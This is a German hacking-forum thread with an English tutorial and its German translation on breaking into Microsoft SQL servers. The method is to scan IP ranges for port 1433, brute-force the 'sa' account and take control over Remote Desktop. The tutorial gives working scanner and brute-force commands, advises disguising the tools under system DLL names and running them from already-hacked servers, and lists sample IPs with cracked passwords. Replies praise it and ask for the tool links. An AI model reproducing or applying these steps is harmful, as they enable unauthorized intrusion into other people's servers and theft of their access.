Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 15
  1. #1
    Trojaner
    Registriert seit
    29.05.2007
    Beiträge
    66

    Standard SQL Hacking via 1433 Console

    Dieses Tutorial habe ich für h4ck-y0u geschrieben gehabt, möchte es euch aber nicht vorenthalten.

    Hi,
    some guys PM'ed me that thy wanna have a good basic tutorial in SQL Server Hacking without any "Injection" !


    So here it is :

    Cahpter 0: Basics
    Chapter 1: Find vulnerable Server
    Cahpter 2: Brute the vulnerable Server
    Chapter 3: Check the Results
    Chapter 4: Hack the Servers
    Chapter 5: Break Security Rules


    Uses Toolz: Modded DFind , Modded SQLck , Modded mexP , mssqlchecker.exe , Modded fPort , hidden32 , Modded KillZ , Servu-U UD , (RATmin) , Moddet SQLexec III , 1.013 , Simple SQL Browser , Bulletproof FTP Server , Pumpkin TFTP , FlashFXP , Auto-Hacker by Z3r00l / dermoeter

    All this tools are in a link above this tutorial! PLS dont share them 2 much .... just h4ck-y0u base!




    Chapter 0:

    First some Basics to MSSQL Hacking. This type of Server is runnung on Port 1433. The basic User Account is "sa".
    There are thounds of damn fucking n00b admins out there. They leave the "sa" password blank or "12345" "sa" etc.
    The advantage of hacking MSSQL is that you can use all your well knows cmd commands. net stop , net start , net user , etc
    Lets start:





    Chapter 1:

    Find vulnerable Server - Okay Guyz lets start. First we need some IP's with MSSQL running. MSSQL is runnung on port 1433.
    Extract the Tool DFind.exe or if you have a remote Server with full rights use dfindold.exe cause its most time UD by AVS.
    Then you have to choose a good IP-Range wich you wanna scan for MSSQL. But PLEASE ! Make a Whois to some IP's first. Dont scan honeypots or in your own country ! I use http://www.iks-jena.de/cgi-bin/whois.pl tho whois IP with country results.
    If you are intrested in some special country use http://www.ipaddresslocation.org/ip_...get_ranges.php to show wich ranges are in the selected country. Now back 2 real work.

    Example 1 - Scan on local Computer.

    When you have extracted the DFind.exe to local PC cd to your directory.
    cmd.exe > cd c:\scanner\dfind\ ( example )
    Then run DFind.exe with these Parameters:

    DFind.exe -p 1433 startrange endrange ( example : 207.261.0.0 207.280.255.254 )

    Now there is a .txt file called dfind.txt . Init there are all the foundet IP with an open 1433 port.
    Wait a day or just some hours, depending on the range size.

    Example 2 - scan on a remote Stro/Server

    A hacked SQL with FXPable server is called "Stro" and it comes from the fxp scene. This running FTP-Server allowed to extract various code wich is compatibel to win32 code. A remote Server with Remote Desktop or full rights can also be used but you hoster will kick you in a few hours ^^.
    Just upload your hidden32.exe dfind.exe to your remote and change to the directory.
    Depending on the remote server use this commans

    FXP-Server :site exec hidden32.exe dfind.exe -p 1433 rangestart rangeend ( example : 207.261.0.0 207.280.255.254 ).
    0815-Remote :dfind.exe -p 1433 rangestart rangeend ( example : 207.261.0.0 207.280.255.254 ).

    You can find the dfind.txt in the same directory like ur .exe
    Wait a day or just some hours, depending on the range size.


    There are a few other command line sql scanner. sql 100 500 1000 , sqllhf blabla i hate them all!



    Chapter 2:

    Brute the results shown in dfind.txt

    Example 1 - Brute on local Computer.

    Extract the tools /moded Bruter/ and SQlck.exe. Copy the dfind.txt in the same directory! There are other options but this works 100%. SQLcl.exe is an password auditing tool also called as bruter. Cause were just bruting "sa" in my exmamples you need only a pw.txt file. In my pack there are 2 diffent. A "small" version and a 15mb version. First use the small edition there easy crackable server are not so hard protected like the other
    Then run SQLck.exe with these Parameters:

    SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 200

    -p = Password File
    -i = Scan Result File
    -o = Output File.
    -t = Threats

    Depending on your connection incremenet the -t option.
    Now let them crack. If the size of results.txt grows feel lucky, there are some cracked sql's.

    It's possible that you have not enough RAM to use SQLck.exe
    Then read Example 3 !....
    I've over 100 Hacked Stros. The cracking power is unbelievably!
    My Intel Xenon 3800 with 8GB Ram and a fiber-optic network needs to crack a 1MB dfind file with 1000 threads more than 3 days! So dont be afraid if there are not to much results in the first hours.



    Example 2 - Brute on remote Stro/Server.

    Same thinks like in chapter 1 Example 2.

    Upload /modded Bruter/ SQLck.exe hidden32.exe and PW.txt to your server. Copy the dfind.txt to your sqlck.exe dir!
    Depending on the remote server use this commans


    FXP-Server : site exec hidden32.exe SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 200
    0815-Remote : SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 200

    If the Server hang up dont worry. Just a big start lag.


    Example 3 - When SQLck.exe hangs up.

    Okay then change to your /modded Bruter/ dir.
    There are 3 different files. Legend:

    Sqlck.exe -> rundll32.dll
    password.txt -> mspoolservice.dll
    SQLck_Logfile.txt -> Systemservice.ocx
    result.txt -> winlogon.dll
    hidden.exe -> system32.dll


    Usage1: rundll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 200
    Usage2: site exec system32.dll rundll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 99999

    This tool is not modded by me! The respect goes to the real writer pls!





    Chapter 3 - Check the Results



    Yeah now lets check the bruted results!
    Open your results.txt or winlogon.dll(open with notepad).

    This could be a result:

    202.76.235.51:1433 [sa:123456] Time:422 msec
    202.80.173.17:1433 [sa:sa] Time:313 msec <----lowest time / fastest server
    202.75.223.141:1433 [sa:!@#$%^&*()] Time:453 msec
    202.82.116.202:1433 [sa:sa] Time:328 msec
    202.83.41.166:1433 [sa:] Time:360 msec
    202.82.39.244:1433 [sa:password] Time:313 msec
    202.85.51.12:1433 [sa:password] Time:312 msec
    202.85.169.95:1433 [sa:123] Time:344 msec
    202.86.128.229:1433 [sa:] Time:672 msec
    202.87.47.27:1433 [sa:] Time:3250 msec
    202.88.128.108:1433 [sa:] Time:1593 msec
    202.88.128.190:1433 [sa:] Time:640 msec


    IP USERASS and the React Time. First check the IP's with the lowest React time!!!
    Now open sqlexec2.exe. Just click "later"
    Insert the IP in the Host field. Then insert username and password and klick on connect!

    A worked connection is like this:
    SQL>Connecting 202.97.181.61.
    SQL>Connected to 202.97.181.61.

    A bad connection is like this:
    SQL>Connecting 202.97.181.61.
    SQL>Could not connect to 202.97.181.61.
    SQL>Disconnected.

    This yould happend cause of wrong typed password or since the cracking the server password was changed =(

    On a woking connection type in command linke : dir c:\

    There are also differnt results.

    The good one is the list of files and folders on your server.
    All the other results are explained in chapter 5!



    Chapter 4 - Hack the Servers

    Now the intresting things. If you found a cracked results with listed files and folders FIRST run on your PC

    Example 1 - Check Remote Desktop Connection

    run > mstsc.exe
    Type in the SAME IP from your SQL Server.
    If you can connect and see the remote desktop....damn your in!
    Create your own user:

    p.s. JA Copyright liegt bei mir! dermoeter aka Z3r0c00l

    wer sich gerne wirklich damit beschätigen möchte bekommt den rapidshare link für restliche proggs per PN.

  2. #2
    DateMake Dialer
    Registriert seit
    21.07.2008
    Beiträge
    100

    Standard

    Das sieht ja mal ziemlich nice aus, hab schon was gesucht für etwas wo wohl keine sqli möglich ist. (für mehr sachen bin ich gern offen )
    Nice work

    Razzorhead

  3. #3
    Neuling
    Registriert seit
    14.08.2008
    Beiträge
    1

    Standard

    so ein tut hab ich schon immer gesucht, wirklich klasse geschrieben.

    ich war vor jahren mal scanner in der xdcc szene und habe nach sql server für bots gescannt, leider konnte ich die scanergebnisse immer nur weiterreichen,
    würde gern mehr darüber erfahren wie sql zb gesichert werden etc.

    würde mich über weitere tuts etc freuen, gerne auch per pm

    gruss
    sNAKOR

  4. #4
    Stiller Leser
    Registriert seit
    28.09.2007
    Beiträge
    3

    Standard

    auch von mir: sehr schönes tut
    beschäftige mich atm auch damit, und würd mich auch sehr freuen wenn ich den prog link per pn kriegen würd

    hab dir auch schon ne pn geschickt^^

  5. #5
    Neuling
    Registriert seit
    17.09.2008
    Beiträge
    1

    Standard

    danke, werds mal testen.

    spitzen TUT 8)

  6. #6
    Linus Torvalds
    Registriert seit
    09.03.2008
    Beiträge
    1.189

    Standard

    CHapter0: Basics
    Chapter1: Unsicheren Server finden
    Chapter2: Unsicheren Serber bruten
    Chapter3: Ergebnisse kontrollieren
    Chapter4: Server hacken
    Chapter5: Sicherheits Regeln brechen

    Genutzte Toolz:
    Modded DFind
    Modded SQLck
    Modded mexP ,
    mssqlchecker.exe
    Modded fPort
    hidden32
    Modded KillZ
    Servu-U UD
    (RATmin)
    Moddet SQLexec III
    1.013
    Simple SQL Browser
    Bulletproof FTP Server
    Pumpkin TFTP
    FlashFXP
    Auto-Hacker by Z3r00l / dermoeter
    ++++++++++++++++++++++++++++++++++++++++++++++++++ +++

    Alle diese Tools sind in einem link über dem tutorial,bitte
    verbreitet sie nicht zu sehr...

    Chapter 0:
    Zuerst einige Basics zum MSSQL hacking.Diese Art von Servern
    läuft über den Port 1443. Der Standart Benutzer Account ist "sa" .
    Es gibt tausende von admins da draussen,welche das "sa" passwort leer lassen,oder
    einfache passwörter wie z.B. "12345" ; "sa" oder ähnliche nutzen.
    Der Vorteil beim MSSQL Hacking ist folgender: Du kannst deine bekannten
    cmd commands nutzen,wie z.B. net stop , net start, net user usw.

    Chapter 1:
    Ungeschützten Server finden - Okay Leute , lasst uns anfangen.Zuerst brauchen wir
    einige IP's die mit MSSQL laufen.MSSQL läuft wie gesagt auf port 1433.
    Extrahiert das Tool DFind.exe oder wenn du einen remote Server mit Admin rechten hast
    benutze dfindold.exe weil es weniger AV detectet ist.
    Nun müsst ihr einen guten IP Range wählen,den du auf MSSQL scannen willst.aber BITTE! Macht vorher eine "WhoIS"
    mit manchen IP's.Scannt keine "honeypots"oder in deinem eigenen Land!Ich benutze http://www.iks-jena.de/cgi-bin/whois.pl
    Wenn du interessiert an manchen speziellen ländern bist,benutze
    http://www.ipaddresslocation.org/ip_...get_ranges.php
    um ranges aus dem ausgewählten land anzuzeigen.
    Nun zur richtigen Arbeit.

    beispiel 1 - Scan auf dem lokalen PC
    Wenn du die DFind.exe auf deinem pc extrahiert hast,wechsel per cmd in das verzeichnis ("cd")
    cmd.exe -> cd c:\scanner\dfind\ (beispiel)
    Nun DFind.exe ausführen mit diesen Parametern:

    DFind.exe -p 1433 startrange endrange ( example : 207.261.0.0 207.280.255.254 )

    Nun ist dort eine .txt Datei mit dem Namen "dfind.txt",enthalten sind alle gefundenen
    IP's mit einem offenen Port 1433.
    Wartet ein paar stunden oder einen tag,je nach Range Größe

    Beispiel 2 - Scan auf remote Server

    Ein gehackter SQL server der FXP fähig ist wird "Stro" genannt , dies kommt aus der fxp szene
    Dieser laufende FTP Server erlaubt es alle möglichen codes zu extrahieren,welcher mit win32 zu kombinieren ist.

    Ein remote Server mit Remote Desktop oder Admin rechten , kann auch genutzt werden,aber euer hoster wird euch in
    ein paar Stunden kicken.
    Uploadet eure hidden32.exe dfind.exe auf eueren Remote und wechselt in das verzeichnis
    Je nach remote server nutz diese commands:

    FXP-Server :site exec hidden32.exe dfind.exe -p 1433 rangestart rangeend ( example : 207.261.0.0 207.280.255.254 ).
    0815-Remote :dfind.exe -p 1433 rangestart rangeend ( example : 207.261.0.0 207.280.255.254 ).

    Du kannst die dfind.txt in dem gleichen Verzeichnis wie deine .exe finden.
    Wartet ein paar stunden,oder einen Tag,abhängig von der Ragne Größe.

    Es gibt ein paar andere command zeilen sql scanner. sql 100 500 1000, swllhf
    blabla ich hasse sie alle

    Chapter 2:

    Brite die Ergebnisse in der dfind.txt

    Beispiel 1 - Bruten auf dem lokalen rechner

    Extrahiere die Tools "Moded Bruter nd SQLck.exe" Kopiere die
    dfind.txt in das gleiche Verzeichnis.Es gibt andere Optionen , aber es funktioniert 100%ig. sQLcl.exe ist ein
    Passwort prüf Tool,auch bruter genannt.Weil wir in den Beispielen nur den "sa" bruten brauchst du nur eine "pw.txt" datei.
    In meinem Paket gibt es 2 verschiedene,Eine kleine version,und eine 15mb große.Verwendet zuerst die kleine version,da leicht zu crackende
    Serber nicht so stark geschützt sind wie andere
    Dann startet die SQLck.exe mit diesen Parametern:

    -p = Password File
    -i = Scan Result File
    -o = Output File.
    -t = Threats

    Abhängig von deiner verbindunsrate , die -t option.
    Nun lasst ihn Cracken.Wenn die Größe der "results.txt" gut wächst,sind
    einige gecrackte sql's vorhanden.

    Es ist möglich das du nicht genug RAM hast um die SQLck.exe zu benutzen.
    Dann liest Beispiel 3.
    ich habe über 100 Stros gehackt,die crack wirkng ist unglaublich!
    Mein intel Xenon 3800 mit 8GB RAM nd fiber optic netzwerk braucht mehr als 3 tage um eine 1mb dfind
    datei zu cracken!
    Also wundert euch nicht,wenn es kaum ergebnisse in den ersten stunden gibt.

    Beispiel 2 - Bruten auf einem Remote Stro/Server

    Die selben sachen wie in chapter 1,Beispiel 2

    Uploadet modded Bruter, die SQLcl.exe, hidden.exe und die pw.txt auf euren Server.Kopiere die
    dfind.txt in deine sqlck.exe!
    Abhängig von dem remote server,benutze diese commands

    FXP-Server : site exec hidden32.exe SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 200
    0815-Remote : SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 20

    Wenn der Server sich aufhängt,keine Angst.Nur ein Großer Start Lag

    Beispiel 3 - Wenn die SQLck.exe sich aufhängt

    Wenn das passiert,geht in das modded bruter verzeichnis.
    Dort sind 3 verschiedene Dateien.

    Sqlck.exe -> rundll32.dll
    password.txt -> mspoolservice.dll
    SQLck_Logfile.txt -> Systemservice.ocx
    result.txt -> winlogon.dll
    hidden.exe -> system32.dll

    Nutzung 1: rundll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 200

    Nutzung 2: undll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 200

    Dieses tool wurde von mir gemodded,der Respekt geht an den echten Coder!



    Chapter 3 - Ergebnisse kontrollieren

    lasst uns die gebruteten Ergebnisse checken!
    öffne deine results.txt oder die winlogon.dll (mit dem notepad).

    So könnte ein ergebnis aussehen:

    202.76.235.51:1433 [sa:123456] Time:422 msec
    202.80.173.17:1433 [sa:sa] Time:313 msec <----lowest time / fastest server
    202.75.223.141:1433 [sa:!@#$%^&*()] Time:453 msec
    202.82.116.202:1433 [sa:sa] Time:328 msec
    202.83.41.166:1433 [sa:] Time:360 msec
    202.82.39.244:1433 [sa:password] Time:313 msec
    202.85.51.12:1433 [sa:password] Time:312 msec
    202.85.169.95:1433 [sa:123] Time:344 msec
    202.86.128.229:1433 [sa:] Time:672 msec
    202.87.47.27:1433 [sa:] Time:3250 msec
    202.88.128.108:1433 [sa:] Time:1593 msec
    202.88.128.190:1433 [sa:] Time:640 msec

    IP USERASS und die reaktionszeit.
    Zuerst checkt die IP's mit der geringsten Reaktionszeit
    nun öffnet die sqlexec2.exe. Klickt einfach "later"
    Fügt die IP in das Host Feld.Dann fügt username und passwort ein
    und klickt auf "connect"


    Eine funktioniernde verbindung sieht so aus:
    SQL>Connecting 202.97.181.61.
    SQL>Connected to 202.97.181.61.

    Eine nicht funktionierende Verbindung sieht so aus:
    SQL>Connecting 202.97.181.61.
    SQL>Could not connect to 202.97.181.61.
    SQL>Disconnected.

    Das kann passieren,wenn ein passwort falsch geschrieben wurde oder seit
    dem cracken geändert wurde.

    Auf einem funktionierendem Server tippe ein command ein wie "dir c:\"

    Dort gibt es verschiedene Ergebnisse.

    Das Gute ist die liste der dateien und ordner auf deinem Server.
    Alle anderen Erebnisse sind in chapter 5 erklärt



    Chapter 4 - Die Server hacken

    Nun die interessanten sachen.Wenn du ein gecracktest Ergebnis
    mit aufgelistetem Dateien und Ordnern , lasst es zuerst auf eurem pc laufen!

    Beispiel 1 - Remote Desktop Verbindung kontrollieren
    ausführen -> mstsc.exe
    Füge die GLEICHE ip von deinem SQL Serber ein
    Wenn du vebinden kannst,hast du es geschafft.
    Erstelle deinen eigenen User.

    Copyright by demoeter aka Z3roc00l
    Übersetzt von Gumball




    ----------------------------------------------------------------


    Mein beitrag dazu,mal das anze auf Deutsch...
    08.03.2009

  7. #7
    Anfänger
    Registriert seit
    01.03.2008
    Beiträge
    5

    Standard

    hmmm ein video tutorial besser :S ich habe ganz venig kapiert :S plzz ein vid-tut

  8. #8
    Bad Times Virus Avatar von Sirius.GER
    Registriert seit
    17.08.2007
    Beiträge
    562

    Standard

    ja, ich muss sagen es ist ein echt klasse tut, aber warum haste das nich in die Tut-Section gepostet??

    Ich reporte es mal, damit die MOD's das verschieben ;=)


    ICQ: 336504


    Und wird mir meine Last mal zu schwer, dann nimmt der Teufel meine Asche und verstreut sie im Meer

  9. #9
    CIH-Virus
    Registriert seit
    02.12.2007
    Beiträge
    420

    Standard

    Nice tutorial hast ne PN

  10. #10
    Neuling
    Registriert seit
    24.09.2008
    Beiträge
    1

    Standard

    wo bekomme ich die tools her also dfind usw

Seite 1 von 2 12 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •